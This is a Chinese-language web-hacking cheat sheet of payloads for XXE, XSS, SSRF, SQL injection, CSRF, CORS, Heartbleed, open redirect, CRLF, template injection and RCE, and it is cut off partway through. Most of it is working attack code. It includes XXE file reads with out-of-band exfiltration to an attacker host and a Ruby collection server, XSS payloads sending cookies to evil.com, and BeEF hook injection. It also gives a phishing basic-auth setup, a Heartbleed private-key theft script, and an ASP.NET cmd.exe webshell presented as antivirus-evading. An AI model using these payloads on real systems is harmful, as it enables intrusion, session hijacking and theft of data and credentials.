发现post请求的接口的时候,可以这样试试:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <methodCall><methodName>&test;</methodName></methodCall>如果发现了一个错误:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test "nice string bro">] > <methodCall><methodName>&test;</methodName></methodCall>说明能够解析,试试读文件:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&test;</methodName></methodCall>或者用php伪协议:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">] > <methodCall><methodName>&test;</methodName></methodCall>得到的结果再base64解码即可。
webgoat8 测试方法试一试是否可以添加实体的评论:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <comment><text>&test;</text></comment>可以的话,试试file:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <comment><text>&test;</text></comment> MUTILLIDAE要获取mutillidae上的文件,要在form表单提交的过程中使用测试的payload:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>或者把xml版本忽略掉:
<!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>以及上面提到的php流:
<!DOCTYPE a [<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">] > <methodCall><methodName>&TEST;</methodName></methodCall> OUT OF BAND 基础测试 copy the payload to clipboard <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]><foo>&xxe;</foo>看看是否发送了请求
成功后,再利用其他payload
读文件wing.xml
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/lsb-release"> <!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd"> %dtd; ]> <data>&send;</data>vps->evil.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;
host in dtd:
python -m SimpleHTTPServer 8000
使用FTP读文件evil.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>将dtd文件放在VPS上:
<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">
ruby利用脚本:
require 'socket' ftp_server = TCPServer.new 2121 http_server = TCPServer.new 8088 log = File.open( "xxe-ftp.log", "a") payload = '<!ENTITY % asd SYSTEM "file:///etc/passwd">' Thread.start do loop do Thread.start(http_server.accept) do |http_client| puts "HTTP. New client connected" loop { req = http_client.gets() break if req.nil? if req.start_with? "GET" http_client.puts("HTTP/1.1 200 OK\r\nContent-length: #{payload.length}\r\n\r\n#{payload}") end puts req } puts "HTTP. Connection closed" end end end Thread.start do loop do Thread.start(ftp_server.accept) do |ftp_client| puts "FTP. New client connected" ftp_client.puts("220 xxe-ftp-server") loop { req = ftp_client.gets() break if req.nil? puts "< "+req log.write "get req: #{req.inspect}\n" if req.include? "LIST" ftp_client.puts("drwxrwxrwx 1 owner group 1 Feb 21 04:37 test") ftp_client.puts("150 Opening BINARY mode data connection for /bin/ls") ftp_client.puts("226 Transfer complete.") elsif req.include? "USER" ftp_client.puts("331 password please - version check") elsif req.include? "PORT" puts "! PORT received" puts "> 200 PORT command ok" ftp_client.puts("200 PORT command ok") else puts "> 230 more data please!" ftp_client.puts("230 more data please!") end } puts "FTP. Connection closed" end end end loop do sleep(10000) end
fuzz
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE-Fuzzing.txt
XSS对于asp的站点,我们用unicode编码尖括号,适用于存储型XSS:
'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'
文件上传的XSS发现上传点的时候,可以试试用payload作为文件名:
<img src=x onerror=alert('XSS')>.png
or:
"><img src=x onerror=alert('XSS')>.png
or:
"><svg onmouseover=alert(1)>.svg
SVGstuff.svg
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert('XSS!'); </script> </svg>
XML<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>
CSP BYPASSscript-src self: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
常用的payload svg/onload '-alert(1)-' eval(atob('YWxlcnQoMSk=')) <iMg SrC=x OnErRoR=alert(1)> <div onmouseover="alert('XSS');"></Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> - ```""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
AUTH CRED遇到http-only的时候:
使用钓鱼的基本身份验证获取其凭据
注册一个和目标类似的域名 https://github.com/ryhanson/phishery 编译然后运行 设置payload―- <img/src/onerror=document.location="https://evil.com/"> 等待目标上线可还行
偷Cookie
<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>
Blacklist bypass:
过滤了 //,:,",<和>
btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')
payload:
eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))
另外一个:
<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>
比较不错的一个payload:
<svg onload=fetch("//attacker/r.php?="%2Bcookie)>
nc 监听:
nc -lvp 8090
测试session劫持利用burp重放功能进行测试。
看不同cookie会有什么变化。
FILTER BYPASS RESOURCES收集到的payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/ https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code https://brutelogic.com.br/blog/avoiding-xss-detection/ https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
基于POST的XSS如果遇到无法将基于POST的XSS转换为GET请求的情况(可能目标服务器上禁用了GET请求),试试CSRF。
DOM XSS<target.com>/#<img/src/onerror=alert("XSS")>
beef的hook,urlencode
<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>
#<img/src="1"/onerror=alert(1)>
#><img src=x onerror=prompt(1);>
这些站点有大量的xss payload
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection https://zseano.com/tutorials/4.html https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html http://www.xss-payloads.com/payloads-list.html?a#category=all
payload生成:
xssor.io http://www.jsfuck.com/ https://github.com/aemkei/jsfuck https://convert.town/ascii-to-text http://jdstiles.com/java/cct.html
SSRF在可以控制url参数的情况下,只要不重定向,就可以测试一下SSRF。
Webhooks, PDF 生成, 文档解析, 文件上传这些地方都可以重点关注一下。
PS: https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
想办法探测内网资产: http://internal-server:22/notarealfile.txt
更换端口,查看回显,判断端口的开放。
没有回显的情况下,按照响应时间判断,以及DNSLOG,这玩意burp自带的也好用的。
根据我的经验,一些组件只能使用某些端口,例如80,8080,443等。最好对这些端口进行测试。
如果你的payload中有路径,最好带上&,#
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000& http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#
这篇文章对SOP和CORS以及SSRF都有很好的讲解:https//www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/
Bug Bounty Write-ups:
https://hackerone.com/reports/115748 https://hackerone.com/reports/301924 https://www.sxcurity.pro/hackertarget/ http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/
SQL注入使用SQLMap在PUT REST Params中测试SQLi:
1. 使用 *标记Vulnerable参数 2. 复制请求并将其粘贴到文件中。 3. 用sqlmap运行: sqlmap -r <file with request> -vvvv
备忘录: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
可以试试双编码输入。
会话固定快速检查的方法,可用于确定会话固定漏洞是否是网站上的问题:
转到登录页面,观察未经身份验证的用户拥有的会话ID。 登录该站点。进入后,观察用户拥有的会话ID。如果会话ID与用户进行身份验证之前由站点提供的会话ID匹配,那么存在会话固定漏洞。
CSRF一些绕过技术,即使有CSRF Token:
https://zseano.com/tutorials/5.htmlcsrf和reset api:
<html> <script> function jsonreq() { var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST","https://target.com/api/endpoint", true); xmlhttp.setRequestHeader("Content-Type","text/plain"); //xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xmlhttp.withCredentials = true; xmlhttp.send(JSON.stringify({"test":"x"})); } jsonreq(); </script> </html>
案例:
https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b http://c0rni3sm.blogspot.com/2018/01/1800-in-less-than-hour.html
CSRF TO REDECT XSS
<html> <body> <p>Please wait... ;)</p> <script> let host = 'http://target.com' let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e' let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E' function submitRequest() { var req = new XMLHttpRequest(); req.open(<CSRF components, which can easily be copied from Burp's POC generator>); req.setRequestHeader("Accept", "*\/*"); req.withCredentials = true; req.onreadystatechange = function () { if (req.readyState === 4) { executeXSS(); } } req.send(); } function executeXSS() { window.location.assign(host+'<URI with XSS>'+alert_payload); } submitRequest(); </script> </body> </html>
文件上传漏洞在OS X上创建测试10g文件(对于测试文件上载限制很有用):
mkfile -n 10g temp_10GB_file
无限制的文件上传资源:
http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html
一些备忘录: https://github.com/jhaddix/tbhm
CORS配置错误用于测试的POC:
<!DOCTYPE html> <html> <body> <center> <h2>CORS POC Exploit</h2> <div id="demo"> <button type="button" onclick="cors()">Exploit</button> </div> <script> function cors() { var req = new XMLHttpRequest(); req.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = this.responseText; // If you want to print something out after it finishes: //alert(req.getAllResponseHeaders()); //alert(localStorage.access_token); } }; // If you need to set a header (you probably won't): // req.setRequestHeader("header name", "value"); req.open("GET", "<site>", true); req.withCredentials = true; req.send(); } </script> </body> </html>
资源:
https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/ http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html https://www.youtube.com/watch?v=wgkj4ZgxI4c http://ejj.io/misconfigured-cors/ https://www.youtube.com/watch?v=lg31RYYG-T4 https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS https://w3c.github.io/webappsec-cors-for-developers/#cors http://gerionsecurity.com/2013/11/cors-attack-scenarios/ Using CORS misconfiguration to steal a CSRF Token: https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/
测试心脏出血漏洞nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d
偷私钥wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py echo "<target>:<port>" > targets.txt python heartbleed.py -f targets.txt -v -e
wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py python heartbleed-poc.py <target> -p <target port> | less
https://gist.github.com/bonsaiviking/10402038
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py 重定向http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html
重定向到beef:
<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>使用Burp中的Decoder将其编码为base-64,并将其传递给payload:
data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==
other:
http://;URL=javascript:alert('XSS') data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect
CRLF注入当你看到请求的参数是这样:
http://inj.example.org/redirect.asp?origin=foo
回显是这样:
HTTP/1.1 302 Object moved Date: Mon, 07 Mar 2016 17:42:46 GMT Location: account.asp?origin=foo Connection: close Content-Length: 121 <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
尝试CRLF注射:
http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a
CRLF: %0d%0a
https://www.gracefulsecurity.com/http-header-injection/ https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) https://www.acunetix.com/websitesecurity/crlf-injection/ https://blog.innerht.ml/twitter-crlf-injection/
模板注入您可以将一些代码放入jsfiddle以进行payload测试:
<html> <head> <meta charset="utf-8"> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script> </head> <body> <div ng-app> {{constructor.constructor('alert(1)')()}} </div> </body> </html>
http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
RCE使用WEBSHELL上传(.NET)绕过AV:
这是一个示例,其中包含fuzzdb项目中的一个webshell:
<%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %> <script Language="c#" runat="server"> void Page_Load(object sender, EventArgs e) { } string executeIt(string arg) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c "+arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; } void cmdClick(object sender, System.EventArgs e) { Response.Write("<pre>"); Response.Write(Server.HtmlEncode(executeIt(txtArg.Text))); Response.Write("</pre>"); } </script> <HTML> <HEAD> <title>REALLY NICE</title> </HEAD> <body > <form id="cmd" method="post" runat="server"> <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox> <asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"
